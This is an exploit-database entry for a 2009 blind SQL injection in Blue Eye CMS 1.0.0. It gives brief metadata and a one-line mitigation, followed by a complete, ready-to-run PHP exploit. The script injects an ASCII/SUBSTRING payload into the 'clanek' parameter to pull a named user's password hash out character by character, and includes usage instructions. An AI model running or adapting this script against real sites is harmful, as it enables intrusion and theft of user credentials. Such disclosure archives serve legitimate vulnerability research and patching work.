Blue Eye CMS - exploit.company

vendor:

Blue Eye CMS

by:

darkjoker

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Blue Eye CMS

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:blue_eye_cms:blue_eye_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit

This exploit is used to find the sha1 hash of the password of a user in Blue Eye CMS <= 1.0.0. It uses a blind SQL injection vulnerability to find the password of the user. The exploit takes the hostname, path and username as arguments and finds the sha1 hash of the password of the user.

Mitigation:

The user should update to the latest version of Blue Eye CMS.

Source

Exploit-DB raw data:

--+++===============================================================+++--
--+++====== Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit ======+++--
--+++===============================================================+++--


<?php

function usage ()
{
	echo
		"\n[+] Blue Eye CMS <= 1.0.0 Blind SQL Injection Exploit".
		"\n[+] http://kent.dl.sourceforge.net/sourceforge/blueeyecms/blue_eye_cms-1_0_0_preRC.rar".
		"\n[+] Author: darkjoker".
		"\n[+] Site  : http://darkjoker.net23.net".
		"\n[+] Usage : php xpl.php <hostname> <path> <username>".
		"\n[+] Ex.   : php xpl.php localhost /BlueEye admin".
		"\n\n";
	exit ();
}

function query ($user, $pos, $chr)
{
	$query = "x' OR ASCII(SUBSTRING((SELECT password FROM blueeye_users WHERE user = '{$user}'),{$pos},1))={$chr} OR '1' = '2";
	$query = str_replace (" ", "%20", $query);
	$query = str_replace ("'", "%27", $query);
	return $query;
}

function decrypt ($hash)
{
	$sha1 = unpack ("H*", base64_decode ($hash));
	return $sha1 [1];
}

function exploit ($hostname, $path, $user, $pos, $chr)
{
	$fp = fsockopen ($hostname, 80);
	$chr = ord ($chr);
	$query = query ($user, $pos, $chr);

	$get = 
		"GET {$path}/index.php?clanek={$query} HTTP/1.1\r\n".
		"Host: {$hostname}\r\n".
		"Connection: Close\r\n\r\n";
	fputs ($fp, $get);

	while (!feof ($fp))
		$reply .= fgets ($fp, 1024);
	
	fclose ($fp);

	preg_match ("/Autor: (.+?)<br>/", $reply, $x);
	if (empty ($x [1]))
		return false;
	else
		return true;
}

if ($argc != 4)
	usage ();

$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=";
$pos = 1;
$chr = 0;
echo "\n[+] Finding password: ";
while ($chr < strlen  ($key))
{
	if (exploit ($hostname, $path, $user, $pos, $key [$chr]))
	{
		$pass .= $key [$chr];
		echo $key [$chr];
		$chr = -1;
		$pos++;
	}
	$chr++;
}
echo "\n[+] sha1 Hash: ";
echo decrypt ($pass) . "\n\n";

?>

# milw0rm.com [2009-01-15]